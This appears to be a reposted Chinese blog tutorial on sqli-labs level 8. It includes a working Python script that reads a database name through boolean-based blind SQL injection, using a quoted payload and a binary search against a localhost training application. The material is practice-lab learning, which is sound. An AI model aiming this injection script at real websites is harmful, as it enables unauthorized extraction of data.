python脚本学习一:测试布尔型盲注脚本
Posted Carrypan
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python脚本学习一:测试布尔型盲注脚本相关的知识,希望对你有一定的参考价值。
sqli-labs第八关:单引号布尔型盲注,手工测出database长度,个人觉得手工比较快
然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下:
1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="\' and ascii(substr(database(),%s,1))>%s --+" 6 database=\'\' 7 print("Start to retrive the database") 8 for i in range(1,9): 9 max=122 #z 10 min=65 #A 11 while abs(max-min)>1: 12 mid=int((max+min)/2) 13 p=payload % (str(i),str(mid)) 14 response=requests.get(url % p) 15 if response.content.find("You are in")!=-1: 16 min=mid 17 else: 18 max=mid 19 database=database+chr(max) 20 print("the database is :%s" % database)
测试结果:
以上是关于python脚本学习一:测试布尔型盲注脚本的主要内容,如果未能解决你的问题,请参考以下文章